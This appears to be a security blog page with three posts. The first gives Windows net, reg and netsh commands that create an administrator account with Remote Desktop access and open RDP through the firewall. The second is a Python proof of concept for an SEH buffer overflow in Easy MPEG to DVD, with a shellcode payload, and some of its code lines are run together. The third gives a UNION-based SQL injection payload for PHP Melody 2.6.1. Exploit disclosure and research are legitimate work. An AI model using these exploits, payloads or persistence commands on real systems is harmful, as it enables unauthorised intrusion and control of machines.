Adding User Via Windows Command Line

Adding users Windows


 Step 1 - Add User

 net user 'username' 'password' /add

 C:\WINDOWS\system32>net user thunder password /add 

 Step 2 - Add the new User to Remote Desktop Group

 net localgroup "Remote Desktop users" 'username' /add

 C:\WINDOWS\system32>net localgroup "Remote Desktop users" thunder /add

 Step 3 - Adding new user to Administrator group

 net localgroup Administrators 'username' /add

 C:\WINDOWS\system32>net localgroup Administrators thunder /add

 All the above steps in a Single Command

 C:\WINDOWS\system32>net user thunder password /add && net localgroup "Remote Desktop users" thunder /add && net localgroup Administrators thunder /add

 Note : Make sure you have administrator privileges.
In case of an error, there is a possibility of Password Complexity set on the Remote Machine, try a complex password.

Enable Remote Desktop Protocol Services


 C:\WINDOWS\system32>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Add Firewall Rule in Windows to Allow Remote Desktop Connection


 C:\WINDOWS\system32>netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
Posted by No comments:
Labels: , , , ,

Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)

#############################################################################
Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH)
#############################################################################

#Vulnerable Software: Easy MPEG/AVI/DIVX/WMV/RM to DVD
#Vulnerability Name : Buffer Overflow (SEH)
# Exploit Author:         Venkat Rajgor
# Vendor Homepage:   http://www.divxtodvd.net/
# Software Link:          http://www.divxtodvd.net/easy_video_to_dvd.exe
# Tested On:                 Windows 7 x64 
#############################################################################
Exploit Proof of Concept :

#!/usr/bin/python ###############################################################################
# Exploit Title: Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Field Buffer Overflow (SEH) 
# Date: 05-10-2017 
# Exploit Author: Venkat Rajgor 
# Vendor Homepage: http://www.divxtodvd.net/ 
# Software Link: http://www.divxtodvd.net/easy_video_to_dvd.exe 
# Tested On: Windows 7 x64 
# # # To reproduce the exploit: 
# 1. Click Register 
# 2. In the "Enter User Name" field, paste the content of evil.txt 
############################################################################## 
filename="evil.txt" 
#Buffer
buffer = "\x41" * 1008 
#short Jump 
nSEH = "\xEB\x06\x90\x90" 
#SEH 
SEH = "\x59\x78\x03\x10" 
# Bad Chars 
badchars = "\x00\x0A\x0D\x1A" 

# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c 

# Payload To Popup Calculator 

shell=( "\xba\xf5\xed\x50\xfa\xdb\xde\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x31\x31\x56\x13\x83\xc6\x04\x03\x56\xfa\x0f\xa5\x06\xec\x52" 
"\x46\xf7\xec\x32\xce\x12\xdd\x72\xb4\x57\x4d\x43\xbe\x3a\x61" 
"\x28\x92\xae\xf2\x5c\x3b\xc0\xb3\xeb\x1d\xef\x44\x47\x5d\x6e" 
"\xc6\x9a\xb2\x50\xf7\x54\xc7\x91\x30\x88\x2a\xc3\xe9\xc6\x99" 
"\xf4\x9e\x93\x21\x7e\xec\x32\x22\x63\xa4\x35\x03\x32\xbf\x6f" 
"\x83\xb4\x6c\x04\x8a\xae\x71\x21\x44\x44\x41\xdd\x57\x8c\x98" 
"\x1e\xfb\xf1\x15\xed\x05\x35\x91\x0e\x70\x4f\xe2\xb3\x83\x94" 
"\x99\x6f\x01\x0f\x39\xfb\xb1\xeb\xb8\x28\x27\x7f\xb6\x85\x23" 
"\x27\xda\x18\xe7\x53\xe6\x91\x06\xb4\x6f\xe1\x2c\x10\x34\xb1" 
"\x4d\x01\x90\x14\x71\x51\x7b\xc8\xd7\x19\x91\x1d\x6a\x40\xff" 
"\xe0\xf8\xfe\x4d\xe2\x02\x01\xe1\x8b\x33\x8a\x6e\xcb\xcb\x59" 
"\xcb\x23\x86\xc0\x7d\xac\x4f\x91\x3c\xb1\x6f\x4f\x02\xcc\xf3" 
"\x7a\xfa\x2b\xeb\x0e\xff\x70\xab\xe3\x8d\xe9\x5e\x04\x22\x09" 
"\x4b\x67\xa5\x99\x17\x46\x40\x1a\xbd\x96") 

evil = "\x90"*20 + shell buffer = "A"*1008 + "\xEB\x06\x90\x90"+ "\x59\x78\x03\x10" + evil textfile = open(filename , 'w') textfile.write(buffer) textfile.close()

##############################################################################
#End of Exploit

Screenshot for Reverse Shell:




Posted by No comments:
Labels: , , ,

PHP Melody 2.6.1 SQL Injection - CVE-2017-15081


###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -

###################################################
Proof of Concept :


Posted by No comments:
Labels: , , , , , ,
Subscribe to: Posts (Atom)